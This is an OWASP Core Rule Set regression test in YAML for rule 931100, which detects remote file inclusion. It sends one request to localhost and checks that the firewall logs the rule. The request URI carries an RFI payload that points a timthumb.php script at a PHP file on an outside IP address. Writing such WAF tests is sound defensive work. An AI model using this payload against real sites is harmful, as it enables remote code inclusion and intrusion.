---
meta:
  author: csanders-git
  description: None
  enabled: true
  name: 931100.yaml
tests:
  - test_title: 931100-1
    desc: Remote File Inclusion Attack (931100) from old modsec regressions
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
              Accept-Encoding: gzip, deflate
              Accept-Language: zh-sg
              Host: localhost
              Keep-Alive: '300'
              Proxy-Connection: keep-alive
              Referer: http
              User-Agent: "OWASP CRS test agent"
            method: GET
            port: 80
            uri: /wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php
            version: HTTP/1.1
          output:
            log_contains: id "931100"
